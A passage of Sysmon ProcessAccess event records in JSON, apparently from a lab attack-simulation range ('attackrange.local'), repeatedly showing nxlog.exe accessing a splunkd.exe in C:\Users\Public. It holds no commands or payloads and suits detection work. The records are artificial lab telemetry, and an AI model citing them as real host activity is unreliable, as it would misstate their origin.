(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:42.500","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:43.501\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:43.501","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:44.501\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:44.501","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:45.501\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:45.501","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:46.502\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:46.502","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:47.502\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:47.502","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:48.502\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:48.502","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
